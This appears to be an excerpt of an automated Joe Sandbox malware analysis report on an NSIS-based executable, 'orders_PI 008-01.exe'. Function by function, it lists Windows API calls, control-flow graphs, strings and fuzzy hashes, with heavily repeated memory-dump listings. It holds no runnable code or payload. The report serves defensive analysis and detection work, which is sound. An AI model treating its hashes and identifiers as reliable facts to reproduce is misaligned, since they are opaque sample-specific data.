                                        control_flow_graph 665 405dcb-405de6 call 4063ee call 405d6e 670 405de8-405dea 665->670 671 405dec-405df9 call 40669d 665->671 672 405e44-405e46 670->672 675 405e09-405e0d 671->675 676 405dfb-405e01 671->676 678 405e23-405e2c lstrlenW 675->678 676->670 677 405e03-405e07 676->677 677->670 677->675 679 405e2e-405e42 call 405cc3 GetFileAttributesW 678->679 680 405e0f-405e16 call 40674c 678->680 679->672 685 405e18-405e1b 680->685 686 405e1d-405e1e call 405d0f 680->686 685->670 685->686 686->678
                                        APIs
                                          • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,?,?,?), ref: 004063FB
                                          • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                          • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                          • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                        • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                        • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3248276644-3077356548
                                        • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                        • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                        • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                        • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                        Function 004062BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 688 4062bc-4062ee call 40625b 691 4062f0-40631e RegQueryValueExW RegCloseKey 688->691 692 40632c 688->692 691->692 693 406320-406324 691->693 694 406330-406332 692->694 693->694 695 406326-40632a 693->695 695->692 695->694
                                        APIs
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,?,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                        • RegCloseKey.KERNELBASE(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Call
                                        • API String ID: 3356406503-1824292864
                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                        Function 004059D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 696 4059d7-405a08 CreateProcessW 697 405a16-405a17 696->697 698 405a0a-405a13 CloseHandle 696->698 698->697
                                        APIs
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                        • CloseHandle.KERNEL32(?), ref: 00405A0D
                                        Strings
                                        • Error launching installer, xrefs: 004059EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                        • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                        • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                        • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                        • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                        • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                        • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                        Function 004067E3 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,00403514,?), ref: 004067F5
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                          • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                          • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                          • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067D9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                        • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                        • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                        • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                        Function 00405EE4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405EE8
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405F0A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                        • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                        • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                        • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                        Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 004059A8
                                        • GetLastError.KERNEL32(?,?,?,?), ref: 004059B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                        • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                        • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                        • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                        Function 00405F67 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403457,00000000,00000000,0040329E,?,?,00000000,00000000,00000000), ref: 00405F7B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                        Function 00405F96 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,?,00000000), ref: 00405FAA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                        Function 6FF429DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(6FF4505C,?,?,6FF4504C), ref: 6FF429FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 16c39351f470264805a40e5d06f94827341f48c669ad0841d804881d00f59c62
                                        • Instruction ID: 6a4c83bfce6863b7657e238d4064027ab3a0e3674a80c58ce1262d54e8bc5e41
                                        • Opcode Fuzzy Hash: 16c39351f470264805a40e5d06f94827341f48c669ad0841d804881d00f59c62
                                        • Instruction Fuzzy Hash: 01F0A5B8524A86DEEB60FF2C84447093FE0BB2B324B18456AE148D6363E37540ACDB91
                                        Function 0040625B Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
